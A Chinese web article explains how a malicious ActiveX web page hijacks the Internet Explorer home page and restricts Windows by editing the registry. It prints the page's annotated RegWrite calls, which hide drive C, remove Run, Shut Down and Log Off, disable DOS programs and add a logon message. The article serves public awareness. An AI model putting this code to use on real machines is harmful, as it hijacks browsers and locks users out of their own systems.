首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 安全知识 > 浏览网页注册表被修改之迷及解决办法
【标  题】:浏览网页注册表被修改之迷及解决办法
【关键字】:
【来  源】:http://www.cublog.cn/u/30306/showart.php?id=247591

浏览网页注册表被修改之迷及解决办法

1.修改开始菜单

  1)禁止“关闭系统”
  2)禁止“运行”
  3)禁止“注销”

  2.隐藏C盘——你的C盘找不到了

  3.禁止使用注册表编辑器regedit

  4.禁止使用DOS程序

  5.使系统无法进入“实模式”

  6.禁止运行任何程序

  7.将IE浏览器的首页改为http://www.某某.com/,收藏夹中也被加入该网址。

  那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

注:下面代码是将你的IE默认连接首页改为http://www.某某.com/



Shl.RegWrite ("HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page", "http://www.某某.com/");

注:以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;

Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\ \WinOldApp\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\
Winlogon\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\
Winlogon\LegalNoticeText","哈哈哈哈");

注:这个是窗口中文本的内容:“哈哈哈哈”

apache学习杂记:【上一篇】
专业的电信级网络监控管理软件:【下一篇】
【相关文章】
没有相关文章
【随机文章】
  • 协同产品开发组织结构
  • 解说CPU该如何超频
  • Boost库之 assignment
  • Crack J2EE的论坛正式开通了!欢迎注册讨论J2EE技术!
  • sqlserver锁机制(摘抄)
  • WINCE恢复默认HIVE注册表的方法
  • GCC的参数优化与环境变量
  • 让系统自动关闭停止响应的程序
  • UML中的关系与JAVA的实现
  • .NET之ASP WebApplication快速入门(2)
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.